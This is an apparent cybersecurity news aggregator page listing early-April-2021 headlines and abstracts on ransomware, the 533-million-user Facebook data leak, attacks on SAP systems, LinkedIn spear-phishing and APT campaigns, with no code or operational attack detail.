Facebook removes over 1,100 accounts spreading deceptive content Full Text
Abstract
Facebook on Tuesday announced that during March it removed more than 1,100 accounts tied to spreading deceptive content in a variety of countries as part of its effort to root out domestic and international disinformation efforts. The Hill
April 6, 2021 – Ransomware
Florida School District Held to Impossibly High Ransom Full Text
Abstract
Ransomware operators demand $40m from Broward County Public Schools system. Infosecurity Magazine
April 6, 2021 – Vulnerabilities
SAP systems are targeted within 72 hours after updates are released Full Text
Abstract
On-premises SAP systems are targeted by threat actors within 72 hours after security patches are released, SAP security firm Onapsis warns. According to a joint study published by Onapsis and SAP, on-premises SAP systems are targeted by threat... Security Affairs
April 6, 2021 – Ransomware
Hackers rush to new doc builder that uses Macro-exploit, posing as DocuSign Full Text
Abstract
Its use in Trickbot and BazarLoader campaigns puts EtterSilent at the front end of attack chains for two of the most popular ransomware precursors in the world.SCMagazine
April 6, 2021 – Vulnerabilities
Critical Cloud Bug in VMWare Carbon Black Allows Takeover Full Text
Abstract
CVE-2021-21982 affects a platform designed to secure private clouds, and the virtual servers and workloads that they contain.Threatpost
April 06, 2021 – Breach
Have I Been Pwned adds search for leaked Facebook phone numbers Full Text
Abstract
Facebook users can now use the Have I Been Pwned data breach notification site to check if their phone number was exposed in the social site's recent data leak.BleepingComputer
April 6, 2021 – Breach
Third-party security breach compromises data of Singapore job-matching service Full Text
Abstract
Personal details of 30,000 individuals in Singapore may have been illegally accessed, following a security breach that targeted a third-party vendor of a job-matching organization on March 12.ZDNet
April 06, 2021 – Government
Senators call for update on investigations into SolarWinds, Microsoft hacks Full Text
Abstract
Bipartisan leaders of a key Senate panel on Tuesday pressed the Biden administration for more information on its investigation into two recent, massive foreign espionage hacking incidents.The Hill
April 6, 2021 – Vulnerabilities
Parrot Launches Bug Bounty Program Full Text
Abstract
European drone group partners with YesWeHack to launch a Bug Bounty programInfosecurity Magazine
April 6, 2021 – Hacker
Chinese Hackers Selling Intimate Stolen Camera Footage Full Text
Abstract
A massive operation offers access to hacked camera feeds in bedrooms and at hotels.Threatpost
April 06, 2021 – Attack
European Commission, other EU orgs recently hit by cyber-attack Full Text
Abstract
The European Commission and several other European Union organizations were hit by a cyberattack in March according to a European Commission spokesperson.BleepingComputer
April 06, 2021 – Government
Intel heads to resume worldwide threats hearing scrapped under Trump Full Text
Abstract
The House and Senate Intelligence committees will question leaders of five major intelligence and security agencies next week, resuming the annual tradition of a worldwide threats hearing that was abandoned under the Trump administration.The Hill
April 6, 2021 – General
Australia Considers Social Media ID Requirement Full Text
Abstract
Aussies may have to prove who they are to use online dating and social media accountsInfosecurity Magazine
April 06, 2021 – Hacker
Hacker sells $38M worth of gift cards from thousands of shops Full Text
Abstract
A Russian hacker has sold on a top-tier underground forum close to 900,000 gift cards with a total value estimated at $38 million.BleepingComputer
April 06, 2021 – Ransomware
Ransomware hits TU Dublin and National College of Ireland Full Text
Abstract
The National College of Ireland is working on restoring IT services after being hit by a ransomware attack over the weekend that forced the college to take IT systems offline.BleepingComputer
April 6, 2021 – Ransomware
Ransom Gangs Emailing Victim Customers for Leverage - KrebsonSecurity Full Text
Abstract
Ransomware gangs are emailing the victim’s customers and partners directly, warning that their data will be leaked to the dark web unless they can convince the victim firm to pay up.Krebs on Security
April 06, 2021 – Policy and Law
Facebook data leak now under EU data regulator investigation Full Text
Abstract
Ireland's Data Protection Commission (DPC) is investigating a massive data leak concerning a database containing personal information belonging to more than 530 million Facebook users.BleepingComputer
April 6, 2021 – Ransomware
Ransomware Attacks Grew by 485% in 2020 Full Text
Abstract
Report assesses how cyber-criminals have exploited the COVID-19 crisisInfosecurity Magazine
April 06, 2021 – Vulnerabilities
Ongoing attacks are targeting unsecured mission-critical SAP apps Full Text
Abstract
Threat actors are targeting mission-critical SAP enterprise applications unsecured against already patched vulnerabilities, exposing the networks of commercial and government organizations to attacks.BleepingComputer
April 6, 2021 – Phishing
Beware of New “more_eggs” Attack Targets LinkedIn Users With Fake Job Offers Full Text
Abstract
Hackers are spear-phishing business professionals on LinkedIn with fake job offers and infecting them with malware, warns eSentire. eSentire, a...Cyber Security News
April 6, 2021 – Phishing
Healthcare Phishing Incidents Lead to Big Breaches Full Text
Abstract
As healthcare organizations continue to fall victim to phishing incidents, the number of individuals affected by health data breaches involving compromised email accounts continues to rise.Gov Info Security
April 06, 2021 – Vulnerabilities
Watch Out! Mission Critical SAP Applications Are Under Active Attack Full Text
Abstract
Cyber attackers are actively setting their sights on unsecured SAP applications in an attempt to steal information and sabotage critical processes, according to new research. "Observed exploitation could lead in many cases to full control of the unsecured SAP application, bypassing common security and compliance controls, and enabling attackers to steal sensitive information, perform financial fraud or disrupt mission-critical business processes by deploying ransomware or stopping operations," cybersecurity firm Onapsis and SAP said in a joint report published today. The Boston-based company said it detected over 300 successful exploitations out of a total of 1,500 attempts targeting previously known vulnerabilities and insecure configurations specific to SAP systems between mid-2020 to March 2021, with multiple brute-force attempts made by adversaries aimed at high-privilege SAP accounts as well as chaining together several flaws to strike SAP applications. Applicatio...The Hacker News
April 6, 2021 – Breach
AddSecure Acquires Telia Finland’s Alerta Business Full Text
Abstract
The deal will act as a platform for AddSecure to grow its businessInfosecurity Magazine
April 6, 2021 – APT
Chinese Cycldek APT targets Vietnamese Military and Government in sophisticated attacks Full Text
Abstract
China-linked APT group Cycldek is behind an advanced cyberespionage campaign targeting entities in the government and military sector in Vietnam. China-linked APT group LuckyMouse (aka Cycldek, Goblin Panda, Hellsing, APT 27, and Conimes) is targeting...Security Affairs
April 6, 2021 – Hacker
Hackers actively targeting unsecured SAP installs, DHS, SAP and Onapsis warn Full Text
Abstract
With a base of 400,000 clients, SAP’s chief information security officer said this of the alert: “We want them to be aware of what could be the art of the possible.”SCMagazine
April 6, 2021 – Ransomware
Conti Gang Demands $40M Ransom from Florida School District Full Text
Abstract
New details of negotiation between attackers and officials from Broward County Public Schools emerge after a ransomware attack early last month.Threatpost
April 06, 2021 – Criminals
EtterSilent maldoc builder used by top cybercriminal gangs Full Text
Abstract
A malicious document builder named EtterSilent is gaining more attention on underground forums, security researchers note. As its popularity increased, the developer kept improving it to avoid detection from security solutions.BleepingComputer
April 6, 2021 – Phishing
How Deliveroo Scared Customers into Believing They Had Been Scammed Full Text
Abstract
Deliveroo’s email has similarities to the scams we see arriving in users’ inboxes every day, purporting to be for expensive orders, that trick unsuspecting recipients to click on links in a panic.Bitdefender
April 06, 2021 – Education
MITRE Madness: A Guide to Weathering the Upcoming Vendor Positioning Storm Full Text
Abstract
April is usually a whirlwind month for the cybersecurity industry as it coincides with the release of the highly regarded and influential MITRE ATT&CK test results. The ATT&CK test measures cybersecurity platforms' abilities to detect and react to emulated, multistep attacks that can be used as a barometer of platform effectiveness. This means that every cybersecurity vendor will be tripping over themselves to push out blog posts, webinars, press releases, and more touting how great their services are and how the results validate their products. The result is a storm of spin and PR that is hard to navigate. An upcoming webinar offered by Cynet (register here) aims to help industry participants differentiate the spin from the real information when it comes to MITRE ATT&CK results. The Webinar will be led by renowned cybersecurity researcher and Chief Security Strategist for Cynet, Chris Roberts, and Director of Product Marketing for Cynet, George Tubin. The conver...The Hacker News
April 6, 2021 – Ransomware
Sophos Links Mount Locker to Astro Locker Ransomware Full Text
Abstract
Experts suspect branding move to kick-start affiliate programInfosecurity Magazine
April 6, 2021 – General
Four in ten temporary BYOD policies will become permanent Full Text
Abstract
A new report from Verizon also noted that 66% of professionals polled said the term “remote work” would die out within five years.SCMagazine
April 6, 2021 – Malware
New Janeleiro Banking Trojan Strikes Companies, Government Agencies in Brazil Full Text
Abstract
A banking Trojan striking corporate targets across Brazil has been unmasked by researchers. On Tuesday, ESET published an advisory on the malware, which has been in development since 2018.ZDNet
April 6, 2021 – General
What we know about the SolarWinds ‘Sunburst’ exploit, and why it still matters Full Text
Abstract
The Sunburst backdoor gave the APT group access to thousands of SolarWinds customers’ networks, enabling them to explore those networks under the security radars of the organizations’ security teams.Check Point Research
April 6, 2021 – Vulnerabilities
VMware Patches Critical Flaw in Carbon Black Cloud Workload Full Text
Abstract
Tracked as CVE-2021-21982 and featuring a CVSS score of 9.1, the vulnerability could allow attackers to bypass authentication through manipulation of a URL on the interface.Security Week
April 6, 2021 – Phishing
Fake LinkedIn job offers scam spreading More_eggs backdoor Full Text
Abstract
Researchers warn that the More_eggs backdoor can also exfiltrate data from a device, putting your social media accounts, emails, browsing history, and cryptocurrency wallets at risk of being stolen.Hackread
April 6, 2021 – Government
CISA: Patch These Three Fortinet Bugs Now to Avoid Compromise Full Text
Abstract
Attackers targeting government, commercial and tech firmsInfosecurity Magazine
April 6, 2021 – Privacy
Privacy Concerns Sparked by Rust Programming Language Full Text
Abstract
While Rust has become a very popular language, for the past five years, developers have been concerned by their production builds leaking potentially sensitive debug information, writes Ax Sharma.Heimdal Security
April 6, 2021 – Breach
This service allows checking if your mobile is included in the Facebook leak Full Text
Abstract
Security researcher implemented a service to verify if your mobile number is included in the recent Facebook data leak. Security researcher Yaser Alosefer developed a new tool to help users to determine if their mobile numbers are included within...Security Affairs
April 6, 2021 – General
99% of security pros concerned about their IoT and IIoT security Full Text
Abstract
According to a new survey, 99% of security professionals report challenges with the security of their IoT and IIoT devices, and 95% are concerned about risks associated with these connected devices.Help Net Security
April 6, 2021 – Policy and Law
Admin of DeepDotWeb (DDW) Pleads Guilty for Connecting Internet users with Darknet Marketplaces Full Text
Abstract
Recently, the administrator of DeepDotWeb, Tal Prihar, pleaded guilty, as he received kickbacks for connecting all the customers like the buyers...Cyber Security News
April 6, 2021 – Phishing
LinkedIn Users Targeted by Spear-Phishing Campaign Full Text
Abstract
Golden Chickens group goes gunning for job-seekersInfosecurity Magazine
April 6, 2021 – Phishing
Phishing Trends With PDF Files in 2020: 5 Approaches Attackers Use Full Text
Abstract
To lure users into clicking on embedded links and buttons in phishing PDF files, Unit 42 identified the top five schemes grouped as Fake Captcha, Coupon, Play Button, File Sharing, and E-commerce.Palo Alto Networks
April 6, 2021 – General
33.4% of ICS computers hit by a cyber attack in H2 2020 Full Text
Abstract
According to a report published by Kaspersky, the percentage of ICS computers hit by a cyber attack in the second half of 2020 on a global scale was 33.4% (+0.85% compared with H1 2020).Security Affairs
April 06, 2021 – Hacker
Hackers From China Target Vietnamese Military and Government Full Text
Abstract
A hacking group related to a Chinese-speaking threat actor has been linked to an advanced cyberespionage campaign targeting government and military organizations in Vietnam. The attacks have been attributed with low confidence to the advanced persistent threat (APT) called Cycldek (or Goblin Panda, Hellsing, APT 27, and Conimes), which is known for using spear-phishing techniques to compromise diplomatic targets in Southeast Asia, India, and the U.S. at least since 2013. According to researchers from Kaspersky, the offensive, which was observed between June 2020 and January 2021, leverages a method called DLL side-loading to execute shellcode that decrypts a final payload dubbed "FoundCore." DLL side-loading has been a tried-and-tested technique used by various threat actors as an obfuscation tactic to bypass antivirus defenses. By loading malicious DLLs into legitimate executables, the idea is to mask their malicious activity under a trusted system or software proc...The Hacker News
April 6, 2021 – Vulnerabilities
Experts discovered a privilege escalation issue in popular Umbraco CMS Full Text
Abstract
Experts discovered a vulnerability in the popular CMS Umbraco that could allow low privileged users to escalate privileges to "admin." Security experts from Trustwave have discovered a privilege escalation vulnerability in the popular website CMS,...Security Affairs
April 6, 2021 – Vulnerabilities
Experts found critical flaws in Rockwell FactoryTalk AssetCentre Full Text
Abstract
Rockwell Automation has recently addressed nine critical vulnerabilities in its FactoryTalk AssetCentre product with the release of version v11. The American provider of industrial automation Rockwell Automation on Thursday informed customers that...Security Affairs
April 06, 2021 – Malware
Hackers Targeting professionals With ‘more_eggs’ Malware via LinkedIn Job Offers Full Text
Abstract
A new spear-phishing campaign is targeting professionals on LinkedIn with weaponized job offers in an attempt to infect targets with a sophisticated backdoor trojan called "more_eggs." To increase the odds of success, the phishing lures take advantage of malicious ZIP archive files that have the same name as that of the victims' job titles taken from their LinkedIn profiles. "For example, if the LinkedIn member's job is listed as Senior Account Executive—International Freight the malicious zip file would be titled Senior Account Executive—International Freight position (note the 'position' added to the end)," cybersecurity firm eSentire's Threat Response Unit (TRU) said in an analysis. "Upon opening the fake job offer, the victim unwittingly initiates the stealthy installation of the fileless backdoor, more_eggs." Campaigns delivering more_eggs using the same modus operandi have been spotted at least since 2018, with the backdo...The Hacker News
April 6, 2021 – Ransomware
Browser Locker Ransomware – A Fake Page that Threatens user and demands Ransom Full Text
Abstract
Browser lockers, also known as browlocks, are a class of online threats that prevent the victim from using the browser and...Cyber Security News
April 5, 2021 – Vulnerabilities
Probing restrictions may stilt Pentagon’s vulnerability disclosure program for contractors Full Text
Abstract
The push and pull between the military and security researchers is indicative of more widespread tensions that need to be surmounted if the Pentagon wants to secure its contracting base.SCMagazine
April 05, 2021 – Breach
Adult content from hundreds of OnlyFans creators leaked online Full Text
Abstract
After a shared Google Drive was posted online containing the private videos and images from many OnlyFans accounts, a researcher has created a tool allowing content creators to check if they are part of the leak.BleepingComputer
April 05, 2021 – General
Hillicon Valley: Supreme Court sides with Google in copyright fight against Oracle | Justices dismiss suit over Trump’s blocking of critics on Twitter | Tim Cook hopes Parler will return to Apple Store Full Text
Abstract
The Supreme Court on Monday sided with Google against Oracle in a copyright fight, while vacating a previous ruling involving former President Trump’s use of Twitter. Meanwhile, Apple CEO Tim Cook said he hoped Parler would eventually return to the App Store, and a national labor board concluded that Amazon had illegally retaliated against two workers by firing them for speaking out against company policies.The Hill
April 5, 2021 – Encryption
Encryption debate could have enterprise security implications Full Text
Abstract
As the United Kingdom reignites the debate over data encryption, concerns about the trickle-down impact on businesses emerge.SCMagazine
April 5, 2021 – Covid-19
Scholarship program to help aspiring NYC cyber pros hit financially by COVID Full Text
Abstract
SC Media presents a Q&A with Fullstack Academy’s NYC campus director and the NYC Economic Development Corporation’s assistant VP of emerging tech initiatives.SCMagazine
April 5, 2021 – Breach
533M Facebook Accounts Leaked Online: Check if You Are Exposed Full Text
Abstract
An estimated 32 million of the half-billion Facebook account details posted online were tied to US-based accounts.Threatpost
April 5, 2021 – Hacker
Spy Operations Target Vietnam with Sophisticated RAT Full Text
Abstract
Researchers said the FoundCore malware represents a big step forward when it comes to evasion.Threatpost
April 05, 2021 – Solution
Microsoft Defender for Endpoint now supports Windows 10 Arm devices Full Text
Abstract
Microsoft today announced that Microsoft Defender for Endpoint, the enterprise version of its Defender antivirus, now comes with support for Windows 10 on Arm devices.BleepingComputer
April 5, 2021 – Phishing
LinkedIn Spear-Phishing Campaign Targets Job Hunters Full Text
Abstract
Fake job offers lure professionals into downloading the more_eggs backdoor trojan.Threatpost
April 5, 2021 – Criminals
Did Facebook’s business model make the company an easier target for cybercriminals? Full Text
Abstract
Some researchers argue that the situation showcases why Facebook must revisit how it handles and secures personal information.SCMagazine
April 5, 2021 – Vulnerabilities
Apple Mail Zero-Click Security Vulnerability Allows Email Snooping Full Text
Abstract
The researcher is offering details on CVE-2020-9922, which can be triggered just by sending a target an email with two .ZIP files attached.Threatpost
April 5, 2021 – Hacker
Once Again, North Korean Hackers Target Security Researchers Full Text
Abstract
According to Google's Threat Analysis Group (TAG), the attackers created a website for a fake company offering offensive security services to attract security researchers.Cyware Alerts - Hacker News
April 5, 2021 – Breach
Altdos Claims to Steal 300,000 Customers’ Data from Furniture Retailer Vhive Full Text
Abstract
In an e-mail to affected customers on Saturday, Altdos said it managed to hack into Vhive three times in nine days and claimed to have stolen information related to over 300,000 customers.Straits Times
April 5, 2021 – Criminals
Pastor Charged with Sharing CSAM Full Text
Abstract
Daytona Beach pastor allegedly shared child sexual abuse material in online chat roomsInfosecurity Magazine
April 5, 2021 – Phishing
Charming Kitten and Medical Researchers - A Cat and Mouse Game Full Text
Abstract
This late-2020 spearphishing campaign aimed to steal the credentials of 25 senior medical researchers in oncology, neurology, and genetic research in the U.S. and Israel.Cyware Alerts - Hacker News
April 5, 2021 – Breach
“Engineering Oversight” Costs ForceDAO $367k Full Text
Abstract
Exploitation by hackers of 183 ETH from newly launched DeFi aggregator was preventableInfosecurity Magazine
April 5, 2021 – APT
A41APT: An APT Campaign, a Multi-Layer Malware, and Japanese Targets Full Text
Abstract
The activity related to the campaign was first observed in November 2020 when reports of Japan-linked organizations being targeted in 17 regions across the world emerged.Cyware Alerts - Hacker News
April 5, 2021 – Breach
Data of Half a Billion Facebook Users Leaked Full Text
Abstract
Cyber-intelligence firm finds personal data of 533 million Facebook users posted onlineInfosecurity Magazine
April 5, 2021 – Hacker
Threat Actors Behind Hancitor Malware uses Network Ping Tool to Enumerate Active Directory (AD) Environment Full Text
Abstract
Hancitor is an information stealer and malware downloader used by a threat actor designated as MAN1, Moskalvzapoe, or TA511.Cyber Security News
April 5, 2021 – General
15 Cybersecurity Pitfalls and Fixes for SMBs Full Text
Abstract
In this roundtable, security experts focused on smaller businesses offer real-world advice on actionable ways to shore up defenses using fewer resources.Threatpost
April 5, 2021 – Attack
GitHub Infrastructure Used to Mine Cryptocurrency Full Text
Abstract
The threat actors seem to be targeting repositories that have GitHub Actions enabled in order to be able to add malicious Actions and file Pull Requests aimed at executing malicious attacker code.Heimdal Security
April 5, 2021 – Breach
2.5M+ users can check whether their data were exposed in Facebook data leak Full Text
Abstract
You can check if your personal information is included in the Facebook data leak by querying the data breach notification service Have I Been Pwned. The news of the availability on a hacking forum of the personal information for 533,313,128 Facebook...Security Affairs
April 5, 2021 – Ransomware
Conti Ransomware Hits Broward County Public Schools with $40 Million Ransom Full Text
Abstract
Several weeks ago, the Conti ransomware gang targeted Broward County Public Schools and threatened to leak sensitive personal data of students and staff unless the district paid a $40 million ransom.Heimdal Security
April 05, 2021 – General
How the Work-From-Home Shift Impacts SaaS Security Full Text
Abstract
The data is in. According to IBM Security's 2020 Cost of a Data Breach Report, there is a 50% increase in cloud usage for enterprises across all industries. The number of threats targeting cloud services, predominantly collaboration services like Office 365, has increased 630%. Moreover, 75% of respondents report that discovery and recovery time from data breaches has significantly increased due to remote work during the pandemic. Although organizations can save over $1 million if they discover a breach in the first 30 days, the average reported response time was a whopping 280 days. In the remote-work world, SaaS apps have become an enticing vector-of-choice for bad actors. Just think of the typical employee, working off-site, untrained in security measures, and how their access or privileges increase the risk of sensitive data being stolen, exposed, or compromised. However, it doesn't have to be that way — a company's SaaS security posture can be strengthened, an...The Hacker News
April 5, 2021 – Breach
533 Million Facebook Users Personal Data Leaked that Includes Mark Zuckerberg’s Cell Phone Number – How to check that your Data Exposed? Full Text
Abstract
Facebook gets hacked to reveal its founder and CEO, Mark Zuckerberg’s cell phone number! However, Mark Zuckerberg’s details aren’t the only ones...Cyber Security News
April 5, 2021 – General
33.4% of ICS computers hit by a cyber attack in H2 2020 Full Text
Abstract
H2 2020 - Kaspersky observed an increase in ransomware attacks on industrial control systems (ICS) in developed countries. Cybersecurity firm Kaspersky has published the Industrial Control System Threat Landscape report for H2 2020 which is based...Security Affairs
April 5, 2021 – General
How cloud architectures defend against the cyber attack surge Full Text
Abstract
If your applications are leveraging a distributed delivery model, for example leveraging cloud-based services such as content delivery networks (CDNs), then you have to worry less about DDoS attacks.Venture Beat
April 5, 2021 – Hacker
The leap of a Cycldek-related threat actor Full Text
Abstract
In the nebula of Chinese-speaking threat actors, it is quite common to see tools and methodologies being shared. One such example of this is the infamous DLL side-loading triad.Kaspersky Labs
April 5, 2021 – Malware
Malware Attack on Applus Impacts Vehicle Inspections in Multiple US States Full Text
Abstract
The company will spend some time to fully restore the operations and continue the vehicle inspections. According to the DMV, inspections will likely be suspended at least for another couple of days.Security Affairs
April 5, 2021 – Encryption
Encryption is either secure or it’s not – there is no middle ground Full Text
Abstract
The principle of end-to-end encryption underpins a system of communication where only the communicating users can read the messages, thereby preventing any eavesdropping.Help Net Security
April 5, 2021 – Ransomware
The “Fair” Upgrade Variant of Phobos Ransomware Full Text
Abstract
Researchers detected the execution of PowerShell scripts that were delivering the ransomware within memory without any executable on disk. It used paste.ee for delivering the loader and ransomware.Morphisec
April 5, 2021 – Phishing
Browser lockers: Extortion disguised as a fine Full Text
Abstract
It includes imitating the “blue screen of death” (BSOD) in the browser, false warnings about system errors or detected viruses, threats to encrypt files, legal liability notices, and many others.Kaspersky Labs
April 5, 2021 – Malware
Poulight Trojan: A “txt file” can steal all your secrets Full Text
Abstract
The Poulight Trojan has been in use since last year and has complete and powerful information-stealing functions. This attack shows that it has begun to spread and be used overseas.360 Total Security
April 5, 2021 – Vulnerabilities
Firmware attacks, a grey area in cybersecurity of organizations Full Text
Abstract
A new report published by Microsoft revealed that 80% of global enterprises were victims of a firmware-focused cyberattack. Microsoft recently published a report, titled "March 2021 Security Signals report," which revealed that more than...Security Affairs
April 5, 2021 – Phishing
Criminals send out fake “census form” reminder – don’t fall for it! Full Text
Abstract
The server name used in the scam is obviously fake because it doesn’t end in .gov.uk, which is a controlled domain available only to official national, regional and local government bodies in the UK.Sophos
April 5, 2021 – Breach
533 million Facebook users’ phone numbers and personal data have been leaked online Full Text
Abstract
The exposed data includes personal information of over 533 million Facebook users from 106 countries, including over 32 million users in the US, 11 million in the UK, and 6 million in India.Business Insider
April 04, 2021 – Breach
How to check if your info was exposed in the Facebook data leak Full Text
Abstract
Data breach notification service Have I Been Pwned can now be used to check if your personal information was exposed in yesterday's Facebook data leak that contains the phone numbers and information for over 500 million users.BleepingComputer
April 04, 2021 – Ransomware
Sierra Wireless resumes production after ransomware attack Full Text
Abstract
Canadian IoT solutions provider Sierra Wireless announced that it resumed production at its manufacturing sites after it halted it due to a ransomware attack that hit its internal network and corporate website on March 20.BleepingComputer
April 4, 2021 – Malware
Beware – Hackers Using Call of Duty Cheats to Deliver Sophisticated Malware Full Text
Abstract
The video gaming industry is a popular target for various threat actors. Players, as well as studios and publishers themselves, are at...Cyber Security News
April 04, 2021 – Breach
533 Million Facebook Users’ Phone Numbers and Personal Data Leaked Online Full Text
Abstract
In what's likely to be a goldmine for bad actors, personal information associated with approximately 533 million Facebook users worldwide has been leaked on a popular cybercrime forum for free—which was harvested by hackers in 2019 using a Facebook vulnerability. The leaked data includes full names, Facebook IDs, mobile numbers, locations, email addresses, gender, occupation, city, country, marital status, account creation date, and other profile details, broken down by country, with over 32 million records belonging to users in the U.S., 11 million users in the U.K., and six million users in India, among others. In total, the data being offered includes user information from 106 countries. Additionally, the data seems to have been obtained by exploiting a vulnerability that enabled automated scripts to scrape Facebook users' public profiles and associated private phone numbers en masse. The flaw has since been fixed by Facebook. "This is old data that was previously...The Hacker News
April 4, 2021 – Malware
Malware attack on Applus blocked vehicle inspections in some US states Full Text
Abstract
A malware attack against vehicle inspection services provider Applus Technologies paralyzed operations, preventing vehicle inspections in eight US states. Applus Technologies is a worldwide leader in the testing, inspection and certification sector, the company...Security Affairs
April 4, 2021 – General
Security Affairs newsletter Round 308 Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to receive the complete weekly Security Affairs Newsletter for free, including the international...Security Affairs
April 4, 2021 – Ransomware
Clop Ransomware operators plunder US universities Full Text
Abstract
Clop ransomware gang leaked online data stolen from Stanford Medicine, University of Maryland Baltimore, and the University of California. Clop ransomware operators have leaked the personal and financial information stolen from Stanford Medicine,...Security Affairs
April 03, 2021 – Ransomware
University of California victim of ransomware attack Full Text
Abstract
The University of California (UC) said Wednesday that it was the victim of a ransomware attack.The Hill
April 03, 2021 – Malware
Malware attack is preventing car inspections in eight US states Full Text
Abstract
A malware cyberattack on emissions testing company Applus Technologies is preventing vehicle inspections in eight states, including Connecticut, Georgia, Idaho, Illinois, Massachusetts, Utah, and Wisconsin.BleepingComputer
April 03, 2021 – Breach
533 million Facebook users’ phone numbers leaked on hacker forum Full Text
Abstract
The mobile phone numbers and other personal information for approximately 533 million Facebook users worldwide have been leaked on a popular hacker forum for free.BleepingComputer
April 3, 2021 – Breach
Data of 533 million Facebook users leaked in a hacking forum for free Full Text
Abstract
On April 3, a user leaked the phone numbers and personal data of 533 million Facebook users in a hacking forum for free online. Bad news for Facebook, a user in a hacking forum has published the phone numbers and personal data of 533 million Facebook...Security Affairs
April 3, 2021 – Breach
Capital One discovered more customers’ SSNs exposed in 2019 hack Full Text
Abstract
More clients of Capital One have been impacted in the 2019 data breach, and the US bank is notifying them of the exposure of their SSNs. US bank Capital One notified a number of additional customers that their Social Security numbers were exposed in the data...Security Affairs
April 03, 2021 – Privacy
Most loved programming language Rust sparks privacy concerns Full Text
Abstract
Rust developers have repeatedly raised concerns about a privacy issue over the last few years. Rust has rapidly gained momentum among developers for its focus on performance, safety, safe concurrency, and for having a syntax similar to C++. However, developers have been bothered by their Rust production binaries leaking usernames.BleepingComputer
April 3, 2021 – Attack
Attackers Found Abusing GitHub Infrastructure to Mine Cryptocurrency Full Text
Abstract
GitHub launched an investigation into a series of attacks aimed at abusing its infrastructure to illicitly mine cryptocurrency. Such attacks have been reported since at least the end of 2020.Security Affairs
April 03, 2021 – Attack
GitHub Actions being actively abused to mine cryptocurrency on GitHub servers Full Text
Abstract
GitHub Actions has been abused by attackers to mine cryptocurrency using GitHub's servers, automatically. The particular attack adds malicious GitHub Actions code to repositories forked from legitimate ones, and further creates a Pull Request for the original repository maintainers to merge the code back, altering the original code.BleepingComputer
April 03, 2021 – Ransomware
Ransomware gang leaks data from Stanford, Maryland universities Full Text
Abstract
Stolen personal and financial information of students at Stanford Medicine, University of Maryland Baltimore (UMB), and the University of California was leaked online by the Clop ransomware group earlier this week.BleepingComputer
April 3, 2021 – Malware
Activision warns of Call of Duty Cheat tool used to deliver RAT Full Text
Abstract
The popular video game publisher Activision is warning gamers that threat actors are actively disguising a remote-access trojan (RAT) in a Call of Duty cheat tool. Activision, the company behind Call of Duty: Warzone and the Guitar Hero series, is warning...Security Affairs
April 3, 2021 – Attack
Attackers are abusing GitHub infrastructure to mine cryptocurrency Full Text
Abstract
The popular code repository hosting service GitHub is investigating a crypto-mining campaign abusing its infrastructure. Code repository hosting service GitHub launched an investigation into a series of attacks aimed at abusing its infrastructure...Security Affairs
April 03, 2021 – Attack
Automated attack abuses GitHub Actions to mine cryptocurrency Full Text
Abstract
GitHub Actions has been abused by attackers to mine cryptocurrency using GitHub's servers, automatically. The particular attack adds malicious GitHub Actions code to repositories forked from legitimate ones, and further creates a Pull Request for the original repository maintainers to merge the code back, altering the original code.BleepingComputer
April 3, 2021 – Ransomware
Evolution and rise of the Avaddon Ransomware-as-a-Service Full Text
Abstract
The Avaddon ransomware operators updated their malware after security researchers released a public decryptor in February 2021. The Avaddon ransomware family first appeared in the threat landscape in February 2020, and its authors started offering...Security Affairs
April 3, 2021 – Policy and Law
22-year-old Charged for Hacking into Public Watering Systems Full Text
Abstract
A 22-year-old man, Wyatt A. Travnichek from the U.S. state of Kansas, has been accused on charges that he accessed, without authorization, a...Cyber Security News
April 3, 2021 – Ransomware
As ransomware stalks the manufacturing sector, victims are still keeping quiet Full Text
Abstract
Two years later, Norsk Hydro’s transparency remains an outlier in a manufacturing sector that is increasingly dogged by ransomware attacks during the coronavirus pandemic.Cyberscoop
April 3, 2021 – Hacker
Hunting the hunters: How Russian hackers targeted US cyber first responders in SolarWinds breach Full Text
Abstract
After infiltrating US government computer networks early last year as part of the SolarWinds data breach, Russian hackers then turned their attention to the very people whose job was to track them down.CNN Money
April 3, 2021 – Government
Biden’s cyber executive order to include new rules for federal agencies, contractors Full Text
Abstract
Under a forthcoming White House order, companies that do business with the federal government would have to meet software security standards and swiftly report cyber incidents to a new entity within the DHS.Cyberscoop
April 3, 2021 – Vulnerabilities
QNAP caught napping as disclosure delay expires, critical NAS bugs revealed Full Text
Abstract
Some QNAP network-attached storage devices are vulnerable to attack because of two critical vulnerabilities, one that enables unauthenticated remote code execution and another that provides the ability to write to arbitrary files.The Register
April 3, 2021 – Ransomware
CNA shares details about ransomware attack, recovery effort Full Text
Abstract
The company, one of the biggest players in cybersecurity insurance specifically, had previously acknowledged an attack, but stopped short of specifying exactly what kind.Cyberscoop
April 3, 2021 – Ransomware
Inside the Ransomware Campaigns Targeting Exchange Servers Full Text
Abstract
As organizations around the world scrambled to patch critical Microsoft Exchange Server flaws patched last month, criminals upped the ante with multiple ransomware campaigns targeting vulnerable servers.Dark Reading
April 3, 2021 – Vulnerabilities
FBI & CISA Warn of Active Attacks on FortiOS Vulnerabilities Full Text
Abstract
The FBI and Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) today issued a joint advisory warning admins of active exploits targeting three vulnerabilities in Fortinet FortiOS.Dark Reading
April 02, 2021 – General
Hillicon Valley: Grid security funding not included in Biden’s infrastructure plan | Russia fines Twitter | Lawmakers call for increased school cybersecurity Full Text
Abstract
Experts this week were disappointed that President Biden’s $2.25 trillion infrastructure package did not include specific funding for securing the electric grid against cyberattacks, although the White House is working on a separate initiative to protect the grid. Meanwhile, a Russian court fined Twitter on Friday for failing to remove certain posts, and two Democratic lawmakers pressed the Education Department to protect K-12 institutions from malicious hackers.The Hill
April 2, 2021 – APT
FBI and CISA are warning of APT actors targeting Fortinet FortiOS servers Full Text
Abstract
FBI and CISA published a joint alert to warn of advanced persistent threat (APT) groups targeting Fortinet FortiOS to access networks of multiple organizations. The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security...Security Affairs
April 2, 2021 – Ransomware
Conti ransomware gang hits Broward County Schools with $40M demand Full Text
Abstract
Photo caption: Coral Glades High School, part of Broward County Public Schools. The $40 million ransomware attack on the district was one of a wave of cases targeting educational institutions over the last couple of weeks. (Formulanone, Public domain, via Wikimedia Commons) The Conti ransomware gang encrypted the systems at Broward County Public Schools several weeks ago and threatened to…SCMagazine
April 2, 2021 – General
Newly announced vehicle SOC will require unique set of skills, policies Full Text
Abstract
Challenges include avoiding false-positive alerts, understanding a complex blend of IT and OT, and establishing policies on attack response.SCMagazine
April 2, 2021 – Breach
